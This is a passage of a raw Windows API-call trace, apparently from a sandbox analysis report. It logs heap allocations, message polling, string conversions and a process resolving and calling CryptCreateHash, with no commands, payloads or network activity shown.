0x2e54e38 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0215.599] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0215.599] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.600] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.600] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0215.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0215.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e18 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0215.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.616] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e28 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.619] HeapFree (in: hHeap=0x970000, 